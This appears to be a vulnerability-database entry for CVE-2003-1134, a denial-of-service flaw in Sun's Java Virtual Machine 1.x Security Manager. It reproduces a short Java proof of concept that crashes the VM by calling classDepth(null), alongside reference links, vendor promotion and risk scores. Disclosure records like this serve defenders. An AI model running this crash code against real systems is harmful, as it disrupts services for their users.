Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2003-1134 | 10 May 200504:00 | – | cve | |
| CVE-2003-1134 | 10 May 200504:00 | – | cvelist | |
| EUVD-2003-1124 | 7 Oct 202500:30 | – | euvd | |
| CVE-2003-1134 | 31 Dec 200305:00 | – | nvd | |
| CVE-2003-1134 | 9 Jan 202611:38 | – | redhatcve |
source: https://www.securityfocus.com/bid/8892/info
A problem has been reported in the Sun Microsystems Java Virtual Machine that occurs when implementing the Security Manager. Because of this, an attacker may be able to crash the virtual machine.
/* InsecurityManager-Demonstration */
/* coded by Marc Schoenefeld */
public class InSecurityManager extends SecurityManager {
public void doit() {
System.out.println("doit");
int o = classDepth(null);
}
public static void main(String[] a) {
InSecurityManager m = new InSecurityManager();
m.doit();
}
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Dec 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.00802